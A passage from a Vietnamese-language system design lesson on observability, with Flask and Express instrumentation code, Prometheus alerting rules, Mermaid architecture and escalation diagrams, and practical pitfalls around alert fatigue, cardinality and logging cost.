        "deployment.environment": "production",
    })
 
    provider = TracerProvider(resource=resource)
 
    # Export traces to OTel Collector via OTLP/gRPC
    otlp_exporter = OTLPSpanExporter(
        endpoint="otel-collector:4317",
        insecure=True,  # Use TLS in production!
    )
    provider.add_span_processor(BatchSpanProcessor(otlp_exporter))
    trace.set_tracer_provider(provider)
 
    # Auto-instrument Flask
    FlaskInstrumentor().instrument_app(app)
    # Auto-instrument outgoing HTTP requests
    RequestsInstrumentor().instrument()
 
    return trace.get_tracer("payment-service")
 
 
# ============================================================
# 3. PROMETHEUS METRICS SETUP
# ============================================================
 
# Service info
SERVICE_INFO = Info("service", "Service information")
SERVICE_INFO.info({
    "name": "payment-service",
    "version": "2.1.0",
    "language": "python",
})
 
# Request metrics (RED method)
REQUEST_COUNT = Counter(
    "http_requests_total",
    "Total HTTP requests",
    ["method", "path", "status"]
)
 
REQUEST_DURATION = Histogram(
    "http_request_duration_seconds",
    "HTTP request duration in seconds",
    ["method", "path"],
    buckets=[0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1.0, 2.5, 5.0, 10.0]
)
 
REQUEST_SIZE = Histogram(
    "http_request_size_bytes",
    "HTTP request size in bytes",
    ["method", "path"],
    buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
 
RESPONSE_SIZE = Histogram(
    "http_response_size_bytes",
    "HTTP response size in bytes",
    ["method", "path"],
    buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
 
# Business metrics
PAYMENT_PROCESSED = Counter(
    "payments_processed_total",
    "Total payments processed",
    ["status", "method"]   # status: success/failed, method: card/bank/wallet
)
 
PAYMENT_AMOUNT = Histogram(
    "payment_amount_usd",
    "Payment amount in USD",
    ["method"],
    buckets=[1, 5, 10, 50, 100, 500, 1000, 5000, 10000]
)
 
# Resource metrics
ACTIVE_CONNECTIONS = Gauge(
    "active_connections",
    "Number of active connections"
)
 
DB_POOL_SIZE = Gauge(
    "db_connection_pool_size",
    "Database connection pool size",
    ["state"]   # active, idle, waiting
)
 
 
# ============================================================
# 4. FLASK APP WITH INSTRUMENTATION
# ============================================================
 
app = Flask(__name__)
tracer = setup_tracing(app)
 
 
@app.before_request
def before_request():
    g.start_time = time.time()
    g.request_id = request.headers.get("X-Request-ID", "unknown")
    ACTIVE_CONNECTIONS.inc()
 
 
@app.after_request
def after_request(response):
    # Calculate duration
    duration = time.time() - g.start_time
    path = request.url_rule.rule if request.url_rule else request.path
 
    # Record metrics
    REQUEST_COUNT.labels(
        method=request.method,
        path=path,
        status=response.status_code
    ).inc()
 
    REQUEST_DURATION.labels(
        method=request.method,
        path=path
    ).observe(duration)
 
    REQUEST_SIZE.labels(
        method=request.method,
        path=path
    ).observe(request.content_length or 0)
 
    RESPONSE_SIZE.labels(
        method=request.method,
        path=path
    ).observe(response.content_length or 0)
 
    ACTIVE_CONNECTIONS.dec()
 
    # Structured access log
    logger.info(
        "Request completed",
        extra={"extra_fields": {
            "method": request.method,
            "path": request.path,
            "status_code": response.status_code,
            "duration_ms": round(duration * 1000, 2),
            "client_ip": request.remote_addr,
            "user_agent": request.headers.get("User-Agent", ""),
            "request_id": g.request_id,
        }}
    )
 
    return response
 
 
@app.route("/api/v1/payments", methods=["POST"])
def process_payment():
    """Example endpoint with full instrumentation."""
    with tracer.start_as_current_span("process_payment") as span:
        try:
            data = request.get_json()
            amount = data.get("amount", 0)
            method = data.get("payment_method", "card")
 
            # Add span attributes (for trace context)
            span.set_attribute("payment.amount", amount)
            span.set_attribute("payment.method", method)
            span.set_attribute("payment.currency", "USD")
 
            # Simulate DB call
            with tracer.start_as_current_span("db_insert_payment"):
                time.sleep(0.02)  # Simulate DB latency
 
            # Simulate external payment gateway call
            with tracer.start_as_current_span("call_payment_gateway") as gw_span:
                gw_span.set_attribute("gateway.name", "stripe")
                time.sleep(0.1)  # Simulate gateway latency
 
            # Record business metrics
            PAYMENT_PROCESSED.labels(status="success", method=method).inc()
            PAYMENT_AMOUNT.labels(method=method).observe(amount)
 
            logger.info("Payment processed successfully", extra={"extra_fields": {
                "payment_method": method,
                "amount": amount,
                "event": "payment_success",
            }})
 
            return {"status": "success", "transaction_id": "txn_abc123"}, 200
 
        except Exception as e:
            PAYMENT_PROCESSED.labels(status="failed", method=method).inc()
            span.record_exception(e)
            span.set_status(trace.StatusCode.ERROR, str(e))
 
            logger.error("Payment processing failed", exc_info=True, extra={"extra_fields": {
                "payment_method": method,
                "amount": amount,
                "event": "payment_failed",
            }})
 
            return {"status": "error", "message": "Payment failed"}, 500
 
 
@app.route("/metrics")
def metrics():
    """Prometheus metrics endpoint."""
    return generate_latest(), 200, {"Content-Type": CONTENT_TYPE_LATEST}
 
 
@app.route("/health")
def health():
    return {"status": "healthy"}, 200
 
 
if __name__ == "__main__":
    logger.info("Starting payment service", extra={"extra_fields": {"event": "startup"}})
    app.run(host="0.0.0.0", port=8082, debug=False)

6.2 Node.js: Express App with Full Observability

/**
 * Full observability instrumentation for a Node.js Express service.
 * Includes: Prometheus metrics, structured logging (pino), OpenTelemetry tracing.
 */
 
// ============================================================
// 1. OPENTELEMETRY SETUP (must be first import!)
// ============================================================
const { NodeSDK } = require("@opentelemetry/sdk-node");
const {
  OTLPTraceExporter,
} = require("@opentelemetry/exporter-trace-otlp-grpc");
const {
  getNodeAutoInstrumentations,
} = require("@opentelemetry/auto-instrumentations-node");
const { Resource } = require("@opentelemetry/resources");
const {
  SEMRESATTRS_SERVICE_NAME,
  SEMRESATTRS_SERVICE_VERSION,
  SEMRESATTRS_DEPLOYMENT_ENVIRONMENT,
} = require("@opentelemetry/semantic-conventions");
 
const sdk = new NodeSDK({
  resource: new Resource({
    [SEMRESATTRS_SERVICE_NAME]: "order-service",
    [SEMRESATTRS_SERVICE_VERSION]: "1.5.0",
    [SEMRESATTRS_DEPLOYMENT_ENVIRONMENT]: "production",
  }),
  traceExporter: new OTLPTraceExporter({
    url: "grpc://otel-collector:4317",
  }),
  instrumentations: [
    getNodeAutoInstrumentations({
      "@opentelemetry/instrumentation-fs": { enabled: false }, // noisy
    }),
  ],
});
 
sdk.start();
 
// ============================================================
// 2. STRUCTURED LOGGING (pino)
// ============================================================
const pino = require("pino");
const { trace, context } = require("@opentelemetry/api");
 
const logger = pino({
  level: process.env.LOG_LEVEL || "info",
  formatters: {
    level(label) {
      return { level: label };
    },
  },
  mixin() {
    // Inject trace context into every log line
    const span = trace.getSpan(context.active());
    if (span) {
      const ctx = span.spanContext();
      return {
        trace_id: ctx.traceId,
        span_id: ctx.spanId,
      };
    }
    return {};
  },
  base: {
    service: "order-service",
    version: "1.5.0",
    environment: "production",
  },
  // PII redaction paths
  redact: {
    paths: [
      "req.headers.authorization",
      "req.headers.cookie",
      "body.password",
      "body.credit_card",
      "body.ssn",
      "user.email",
    ],
    censor: "[REDACTED]",
  },
  timestamp: pino.stdTimeFunctions.isoTime,
});
 
// ============================================================
// 3. PROMETHEUS METRICS
// ============================================================
const promClient = require("prom-client");
const { register } = promClient;
 
// Default metrics (Node.js runtime: event loop, GC, memory, etc.)
promClient.collectDefaultMetrics({
  prefix: "nodejs_",
  gcDurationBuckets: [0.001, 0.01, 0.1, 1, 2, 5],
});
 
// RED metrics
const httpRequestsTotal = new promClient.Counter({
  name: "http_requests_total",
  help: "Total number of HTTP requests",
  labelNames: ["method", "path", "status"],
});
 
const httpRequestDuration = new promClient.Histogram({
  name: "http_request_duration_seconds",
  help: "HTTP request duration in seconds",
  labelNames: ["method", "path"],
  buckets: [0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5, 10],
});
 
const httpRequestSize = new promClient.Histogram({
  name: "http_request_size_bytes",
  help: "HTTP request payload size",
  labelNames: ["method", "path"],
  buckets: [100, 500, 1000, 5000, 10000, 50000, 100000],
});
 
// Business metrics
const ordersCreated = new promClient.Counter({
  name: "orders_created_total",
  help: "Total orders created",
  labelNames: ["status"],
});
 
const orderAmount = new promClient.Histogram({
  name: "order_amount_usd",
  help: "Order amount in USD",
  buckets: [10, 50, 100, 500, 1000, 5000],
});
 
const activeWebSockets = new promClient.Gauge({
  name: "active_websocket_connections",
  help: "Number of active WebSocket connections",
});
 
// ============================================================
// 4. EXPRESS APP
// ============================================================
const express = require("express");
const app = express();
 
app.use(express.json());
 
// Metrics middleware
app.use((req, res, next) => {
  const start = process.hrtime.bigint();
 
  res.on("finish", () => {
    const duration = Number(process.hrtime.bigint() - start) / 1e9;
    const path = req.route?.path || req.path;
 
    // Skip metrics endpoint from recording
    if (path === "/metrics" || path === "/health") return;
 
    httpRequestsTotal.inc({
      method: req.method,
      path: path,
      status: res.statusCode,
    });
 
    httpRequestDuration.observe(
      { method: req.method, path: path },
      duration
    );
 
    httpRequestSize.observe(
      { method: req.method, path: path },
      parseInt(req.headers["content-length"] || "0", 10)
    );
 
    // Structured access log
    logger.info({
      msg: "Request completed",
      method: req.method,
      path: req.path,
      status_code: res.statusCode,
      duration_ms: Math.round(duration * 1000),
      client_ip: req.ip,
      request_id: req.headers["x-request-id"] || "unknown",
    });
  });
 
  next();
});
 
// Routes
app.post("/api/v1/orders", async (req, res) => {
  const tracer = trace.getTracer("order-service");
 
  try {
    const { items, total_amount } = req.body;
 
    logger.info({
      msg: "Processing new order",
      items_count: items?.length,
      total_amount,
      event: "order_processing",
    });
 
    // Simulate order processing
    await new Promise((resolve) => setTimeout(resolve, 50));
 
    // Record business metrics
    ordersCreated.inc({ status: "success" });
    orderAmount.observe(total_amount || 0);
 
    logger.info({
      msg: "Order created successfully",
      order_id: "ord_xyz789",
      total_amount,
      event: "order_created",
    });
 
    res.status(201).json({
      status: "success",
      order_id: "ord_xyz789",
    });
  } catch (err) {
    ordersCreated.inc({ status: "failed" });
 
    logger.error({
      msg: "Order creation failed",
      error: err.message,
      stack: err.stack,
      event: "order_failed",
    });
 
    res.status(500).json({ status: "error", message: "Order failed" });
  }
});
 
// Prometheus metrics endpoint
app.get("/metrics", async (req, res) => {
  res.set("Content-Type", register.contentType);
  res.end(await register.metrics());
});
 
// Health check
app.get("/health", (req, res) => {
  res.json({ status: "healthy", uptime: process.uptime() });
});
 
const PORT = process.env.PORT || 8083;
app.listen(PORT, () => {
  logger.info({ msg: `Order service started on port ${PORT}`, event: "startup" });
});
 
// Graceful shutdown
process.on("SIGTERM", async () => {
  logger.info({ msg: "Received SIGTERM, shutting down gracefully", event: "shutdown" });
  await sdk.shutdown();
  process.exit(0);
});

6.3 Alerting Rules YAML (Prometheus)

prometheus/alert-rules.yml:

groups:
  # ===========================================================
  # GOLDEN SIGNALS ALERTS
  # ===========================================================
  - name: golden_signals
    rules:
      # --- LATENCY ---
      - alert: HighP99Latency
        expr: |
          histogram_quantile(0.99,
            sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
          ) > 0.5
        for: 5m
        labels:
          severity: high
          category: performance
        annotations:
          summary: "P99 latency > 500ms for {{ $labels.service }}"
          description: "P99 latency is {{ $value | humanizeDuration }} for service {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/high-latency"
 
      - alert: CriticalP99Latency
        expr: |
          histogram_quantile(0.99,
            sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
          ) > 2.0
        for: 2m
        labels:
          severity: critical
          category: performance
        annotations:
          summary: "P99 latency > 2s for {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/critical-latency"
 
      # --- ERRORS ---
      - alert: HighErrorRate
        expr: |
          sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
          /
          sum by (service) (rate(http_requests_total[5m]))
          > 0.01
        for: 5m
        labels:
          severity: high
          category: errors
        annotations:
          summary: "Error rate > 1% for {{ $labels.service }}"
          description: "Error rate is {{ $value | humanizePercentage }} for service {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/high-error-rate"
 
      - alert: CriticalErrorRate
        expr: |
          sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
          /
          sum by (service) (rate(http_requests_total[5m]))
          > 0.05
        for: 2m
        labels:
          severity: critical
          category: errors
        annotations:
          summary: "Error rate > 5% for {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/critical-error-rate"
 
      # --- TRAFFIC ---
      - alert: TrafficAnomaly
        expr: |
          sum(rate(http_requests_total[5m]))
          >
          2 * avg_over_time(sum(rate(http_requests_total[5m]))[7d:1h])
        for: 10m
        labels:
          severity: warning
          category: traffic
        annotations:
          summary: "Traffic is 2x above 7-day average"
          description: "Current QPS: {{ $value | humanize }}. Could be organic growth or DDoS."
 
      - alert: ZeroTraffic
        expr: sum(rate(http_requests_total[5m])) == 0
        for: 5m
        labels:
          severity: critical
          category: traffic
        annotations:
          summary: "Zero traffic detected — possible total outage"
          runbook_url: "https://wiki.internal/runbooks/zero-traffic"
 
      # --- SATURATION ---
      - alert: HighCPUUsage
        expr: |
          100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100) > 85
        for: 10m
        labels:
          severity: warning
          category: saturation
        annotations:
          summary: "CPU usage > 85% on {{ $labels.instance }}"
 
      - alert: HighMemoryUsage
        expr: |
          (1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100 > 90
        for: 5m
        labels:
          severity: high
          category: saturation
        annotations:
          summary: "Memory usage > 90% on {{ $labels.instance }}"
 
      - alert: DiskSpaceLow
        expr: |
          (1 - node_filesystem_avail_bytes{mountpoint="/"} / node_filesystem_size_bytes{mountpoint="/"}) * 100 > 85
        for: 15m
        labels:
          severity: warning
          category: saturation
        annotations:
          summary: "Disk usage > 85% on {{ $labels.instance }}"
          description: "Disk will be full in {{ $value | humanizeDuration }} at current rate"
 
      - alert: DiskWillFillIn7Days
        expr: |
          predict_linear(node_filesystem_avail_bytes{mountpoint="/"}[7d], 7*24*3600) < 0
        for: 1h
        labels:
          severity: high
          category: saturation
        annotations:
          summary: "Disk predicted to fill within 7 days on {{ $labels.instance }}"
 
  # ===========================================================
  # SLO-BASED BURN RATE ALERTS
  # ===========================================================
  - name: slo_burn_rate
    rules:
      # SLO: 99.9% availability (error budget = 0.1%)
      # Burn rate 14.4x → budget exhausted in ~2 days
      - alert: SLOBurnRateCritical
        expr: |
          (
            sum(rate(http_requests_total{status=~"5.."}[5m]))
            /
            sum(rate(http_requests_total[5m]))
          ) > (14.4 * 0.001)
          and
          (
            sum(rate(http_requests_total{status=~"5.."}[1h]))
            /
            sum(rate(http_requests_total[1h]))
          ) > (14.4 * 0.001)
        for: 2m
        labels:
          severity: critical
          category: slo
        annotations:
          summary: "SLO burn rate > 14.4x — error budget exhausts in ~2 days"
          runbook_url: "https://wiki.internal/runbooks/slo-burn-rate"
 
      # Burn rate 6x → budget exhausted in ~5 days
      - alert: SLOBurnRateHigh
        expr: |
          (
            sum(rate(http_requests_total{status=~"5.."}[30m]))
            /
            sum(rate(http_requests_total[30m]))
          ) > (6 * 0.001)
          and
          (
            sum(rate(http_requests_total{status=~"5.."}[6h]))
            /
            sum(rate(http_requests_total[6h]))
          ) > (6 * 0.001)
        for: 5m
        labels:
          severity: high
          category: slo
        annotations:
          summary: "SLO burn rate > 6x — error budget exhausts in ~5 days"
 
  # ===========================================================
  # SECURITY ALERTS
  # ===========================================================
  - name: security_alerts
    rules:
      - alert: HighRateOf401
        expr: |
          sum(rate(http_requests_total{status="401"}[5m])) > 50
        for: 2m
        labels:
          severity: high
          category: security
        annotations:
          summary: "High rate of 401 Unauthorized — possible brute force attack"
          runbook_url: "https://wiki.internal/runbooks/auth-attack"
 
      - alert: HighRateOf403
        expr: |
          sum(rate(http_requests_total{status="403"}[5m])) > 100
        for: 2m
        labels:
          severity: high
          category: security
        annotations:
          summary: "High rate of 403 Forbidden — possible enumeration attack"
 
      - alert: SuspiciousTrafficSpike
        expr: |
          sum(rate(http_requests_total[1m]))
          >
          5 * avg_over_time(sum(rate(http_requests_total[1m]))[1d:5m])
        for: 5m
        labels:
          severity: critical
          category: security
        annotations:
          summary: "Traffic spike 5x above daily average — possible DDoS"
          runbook_url: "https://wiki.internal/runbooks/ddos-response"
 
  # ===========================================================
  # MONITORING THE MONITORING (Meta-monitoring)
  # ===========================================================
  - name: meta_monitoring
    rules:
      - alert: PrometheusTargetDown
        expr: up == 0
        for: 3m
        labels:
          severity: high
          category: monitoring
        annotations:
          summary: "Prometheus target {{ $labels.instance }} is down"
 
      - alert: PrometheusStorageFull
        expr: |
          prometheus_tsdb_storage_blocks_bytes / (50 * 1024^3) > 0.85
        for: 15m
        labels:
          severity: warning
          category: monitoring
        annotations:
          summary: "Prometheus storage > 85% of 50GB limit"
 
      - alert: AlertmanagerNotificationFailed
        expr: |
          rate(alertmanager_notifications_failed_total[5m]) > 0
        for: 5m
        labels:
          severity: high
          category: monitoring
        annotations:
          summary: "Alertmanager failing to send notifications via {{ $labels.integration }}"
 
      - alert: HighCardinalitySeries
        expr: prometheus_tsdb_head_series > 500000
        for: 15m
        labels:
          severity: warning
          category: monitoring
        annotations:
          summary: "Prometheus tracking {{ $value }} active series — cardinality may be too high"

7. Mermaid Diagrams

7.1 Observability Stack Architecture

flowchart TB
    subgraph "Application Layer"
        A1[Service A<br/>Python/Flask]
        A2[Service B<br/>Node.js/Express]
        A3[Service C<br/>Go/Gin]
    end

    subgraph "Collection Layer"
        direction TB
        P[Prometheus<br/>Scrapes /metrics<br/>every 15s]
        OC[OpenTelemetry<br/>Collector]
        FB[Filebeat<br/>Log Shipper]
    end

    subgraph "Processing Layer"
        LS[Logstash<br/>Parse · Filter PII<br/>Transform · Enrich]
    end

    subgraph "Storage Layer"
        TSDB[(Prometheus TSDB<br/>Metrics · 30d)]
        ES[(Elasticsearch<br/>Logs · 90d)]
        JG[(Jaeger<br/>Traces · 7d)]
    end

    subgraph "Visualization Layer"
        GR[Grafana<br/>Dashboards]
        KB[Kibana<br/>Log Search]
        JU[Jaeger UI<br/>Trace Explorer]
    end

    subgraph "Alerting Layer"
        AM[Alertmanager<br/>Route · Group · Dedup]
        PD[PagerDuty<br/>Escalation]
        SL[Slack<br/>Notifications]
        EM[Email<br/>Reports]
    end

    %% Data Flow
    A1 & A2 & A3 -->|"/metrics"| P
    A1 & A2 & A3 -->|"OTLP gRPC"| OC
    A1 & A2 & A3 -->|"stdout/files"| FB

    P -->|"store"| TSDB
    OC -->|"traces"| JG
    OC -->|"metrics"| TSDB
    FB -->|"ship"| LS
    LS -->|"index"| ES

    TSDB --> GR
    ES --> KB
    ES --> GR
    JG --> JU
    JG --> GR

    P -->|"alert rules"| AM
    AM --> PD
    AM --> SL
    AM --> EM

    style P fill:#e65100,stroke:#333,color:#fff
    style GR fill:#f9a825,stroke:#333
    style AM fill:#c62828,stroke:#333,color:#fff
    style OC fill:#1565c0,stroke:#333,color:#fff
    style ES fill:#2e7d32,stroke:#333,color:#fff

7.2 Alert Escalation Flow

flowchart TD
    A[Prometheus<br/>Alert Rule Fires] --> B{Alertmanager<br/>Receives Alert}

    B --> C{Severity?}

    C -->|P1 Critical| D[PagerDuty<br/>+ Slack #incidents]
    C -->|P2 High| E[Slack #incidents]
    C -->|P3 Warning| F[Slack #alerts]
    C -->|P4 Info| G[Email / Dashboard]

    D --> H{On-call Primary<br/>Ack in 5min?}
    H -->|Yes| I[Primary Investigates]
    H -->|No| J{On-call Secondary<br/>Ack in 10min?}

    J -->|Yes| K[Secondary Investigates]
    J -->|No| L{Engineering Manager<br/>Ack in 15min?}

    L -->|Yes| M[Manager Coordinates]
    L -->|No| N[VP/CTO Notified<br/>War Room Opened]

    I --> O{Resolved?}
    K --> O
    M --> O
    N --> O

    O -->|Yes| P[Alertmanager sends<br/>RESOLVED notification]
    O -->|No, > 30 min| Q[Incident Commander<br/>Declared]

    P --> R[Postmortem<br/>within 48h]
    Q --> S[Cross-team Response<br/>Status Page Updated]
    S --> O

    E --> T[On-call Reviews<br/>within 30min]
    F --> U[Team Reviews<br/>within 4h]

    style D fill:#c62828,stroke:#333,color:#fff
    style N fill:#c62828,stroke:#333,color:#fff
    style P fill:#2e7d32,stroke:#333,color:#fff
    style Q fill:#e65100,stroke:#333,color:#fff

7.3 Request Lifecycle with Observability

sequenceDiagram
    participant U as User
    participant GW as API Gateway
    participant OS as Order Service
    participant PS as Payment Service
    participant DB as Database
    participant P as Prometheus
    participant L as Logstash/ES
    participant J as Jaeger

    Note over U,J: trace_id: abc-123 propagated via W3C headers

    U->>GW: POST /api/orders
    activate GW
    Note right of GW: span_id: s1<br/>Log: "Received request"<br/>Metric: request_count++

    GW->>OS: Forward + traceparent header
    activate OS
    Note right of OS: span_id: s2 (parent: s1)<br/>Log: "Processing order"<br/>Metric: order_count++

    OS->>PS: POST /internal/payments
    activate PS
    Note right of PS: span_id: s3 (parent: s2)<br/>Log: "Processing payment"

    PS->>DB: INSERT payment
    activate DB
    Note right of DB: span_id: s4 (parent: s3)<br/>Metric: db_query_duration

    DB-->>PS: OK
    deactivate DB

    PS-->>OS: Payment confirmed
    deactivate PS

    OS-->>GW: Order created
    deactivate OS

    GW-->>U: 201 Created
    deactivate GW

    Note over P: Scrapes /metrics every 15s<br/>Records: latency, QPS, errors
    Note over L: Receives structured logs<br/>Indexes in Elasticsearch
    Note over J: Receives trace spans<br/>Builds trace waterfall view

8. Aha Moments & Pitfalls

Aha Moment #1: Alert Fatigue kills Monitoring

Nếu on-call engineer nhận 100 alerts/ngày, sau 2 tuần họ sẽ ignore tất cả — kể cả alert thật sự critical. Đây gọi là alert fatigue (mệt mỏi cảnh báo), và nó đã gây ra nhiều outage nghiêm trọng thực tế (AWS, Google đều từng document).

Giải pháp: Mỗi alert phải actionable (có thể hành động). Nếu alert fires mà engineer không cần làm gì → xoá alert đó. Target: < 5 pages/tuần cho mỗi on-call rotation.

Aha Moment #2: Monitoring the Monitoring

Điều gì xảy ra khi Prometheus chết? Không có alert nào fires cả — vì Prometheus chính là hệ thống gửi alert! Đây là meta-monitoring problem.

Giải pháp:

  • Dùng Deadman’s switch: Prometheus gửi heartbeat alert mỗi 1 phút. Nếu PagerDuty không nhận heartbeat trong 5 phút → alert “Prometheus is down”
  • Chạy 2 Prometheus instances cross-monitor nhau
  • Dùng managed monitoring (Datadog, Grafana Cloud) làm backup cho self-hosted Prometheus

Aha Moment #3: Cardinality Explosion — Silent Killer

Một developer thêm user_id làm label cho metric → 10M users = 10M time series. Prometheus OOM crash lúc 3AM. Không có alert (vì Prometheus đã chết — xem Aha #2).

Prevention:

  • Code review cho mọi metric changes
  • Alert khi prometheus_tsdb_head_series > threshold
  • Enforce label whitelist trong Prometheus relabeling config
  • Dùng recording rules để pre-aggregate high-cardinality metrics

Aha Moment #4: Log Volume = Money

Với 10K QPS, log 5 lines/request = 4.32B log lines/day = 2.16TB raw/day. Elasticsearch storage cho 90 ngày = 64TB. Trên AWS, 64TB EBS gp3 = ~$5,120/month CHỈ cho storage (chưa kể compute cho ES nodes).

Giải pháp thực tế:

  • Log levels: Production default = WARN. Chỉ bật DEBUG cho specific service khi troubleshooting
  • Sampling: Log 10% của successful requests, 100% của errors
  • Tiered storage: Hot (SSD, 7 ngày) → Warm (HDD, 30 ngày) → Cold (S3, 1 năm) → Delete
  • Loki thay Elasticsearch: Index chỉ labels, không full-text → 10x cheaper storage
  • Log aggregation: Thay vì log mỗi request, aggregate thành metrics (rate, error count, latency percentiles)

Pitfall #1: Quên correlate giữa 3 pillars

Metrics cho thấy latency tăng. Logs cho thấy “timeout error”. Nhưng không biết liên quan thế nào vì không có trace_id chung giữa metrics → logs → traces.

Fix: Exemplar (Prometheus + Grafana Tempo). Từ metrics chart, click vào data point → jump thẳng tới trace → từ trace, click vào span → jump tới logs. Tất cả qua trace_id.

Pitfall #2: Dashboard quá nhiều panels

Dashboard 50 panels = không ai đọc. Giống cockpit máy bay — phi công nhìn 6 đồng hồ chính, không phải 500 đồng hồ.

Fix: Mỗi dashboard tối đa 10-12 panels. Tổ chức theo hierarchy: Overview → Service → Instance. Dùng drill-down links giữa các dashboards.

Pitfall #3: Alert trên symptoms, không trên causes

Sai: Alert khi CPU > 80%. CPU có thể cao vì batch job chạy đúng lịch — hoàn toàn bình thường.

Đúng: Alert khi P99 latency > SLO threshold. Nếu CPU 90% mà latency vẫn < 200ms → không cần page ai cả.

Pitfall #4: Không có runbook

Alert fires lúc 3AM. On-call engineer mới join team 2 tuần. Alert message: “HighErrorRate”. Không có link runbook. Engineer mất 45 phút để tìm hiểu context trước khi bắt đầu fix.

Fix: Mọi alert PHẢI có runbook_url annotation. Runbook chứa: (1) Alert nghĩa là gì, (2) Impact, (3) Steps to investigate, (4) Common fixes, (5) Escalation path.

Pitfall #5: Pre-aggregate metrics cho debugging chi tiết

Metric P99 latency tăng → không biết user nào, request gì, deploy nào gây ra. Pre-aggregated → mất detail.

Fix: Cho debugging path, dùng high-cardinality structured events (OpenTelemetry traces với rich attributes hoặc Honeycomb-style). Tham chiếu section 2.11. Metrics cho dashboard, events cho drill-down.

Pitfall #6: Instrument application code cho mọi metric

Add OpenTelemetry SDK → 5% performance overhead, language-specific libraries, miss kernel-level issues (TCP retransmits, syscall delay).

Fix: Dùng eBPF observability (Pixie, Cilium Hubble, Parca) cho infrastructure/network. Application SDK chỉ cho business logic. Tham chiếu section 2.12.

Pitfall #7: Sampling 100% traces ở production

Trace data lớn → 1TB/day → cost nhanh chóng vượt revenue.

Fix: Tail-based sampling — keep 100% errors + 100% slow requests + 1% normal. Dùng OpenTelemetry Collector tail-sampler hoặc DataDog Live Search.


TopicLinkMối liên hệ
EstimationTuan-02-Back-of-the-envelopeDùng estimation để tính alert threshold, storage sizing cho monitoring stack
NetworkingTuan-03-Networking-DNS-CDNMonitor DNS resolution time, CDN cache hit rate, network latency
API DesignTuan-04-API-Design-REST-gRPCInstrument API endpoints với RED metrics, structured logging per endpoint
Load BalancerTuan-05-Load-BalancerMonitor LB health, connection distribution, backend health checks
CacheTuan-06-Cache-StrategyMonitor cache hit rate, eviction rate, memory usage → critical SLI
DatabaseTuan-07-Database-Sharding-ReplicationMonitor replication lag, query latency, connection pool saturation
Message QueueTuan-08-Message-QueueMonitor consumer lag, queue depth, dead letter queue size
Rate LimiterTuan-09-Rate-LimiterSecurity alerts cho rate limit violations, DDoS detection
Consistent HashingTuan-10-Consistent-HashingMonitor hash ring rebalancing, hotspot detection
MicroservicesTuan-11-Microservices-PatternDistributed tracing across services, service mesh observability
CI/CDTuan-12-CICD-PipelineDeploy frequency tracking, change failure rate (DORA metrics)
AuthN/AuthZTuan-14-AuthN-AuthZ-SecurityMonitor failed auth attempts, token expiration, permission denials
Data SecurityTuan-15-Data-Security-EncryptionAudit log monitoring, PII detection, encryption key rotation alerts
URL ShortenerTuan-16-Design-URL-ShortenerCase study: monitor redirect latency, cache hit rate, storage growth
Chat SystemTuan-17-Design-Chat-SystemCase study: monitor WebSocket connections, message delivery latency
NotificationTuan-19-Design-Notification-SystemCase study: monitor delivery rate, push notification latency, failure rate

Tham khảo


Tuần trước: Tuan-12-CICD-Pipeline — CI/CD Pipeline Tuần sau: Tuan-14-AuthN-AuthZ-Security — Authentication & Authorization Security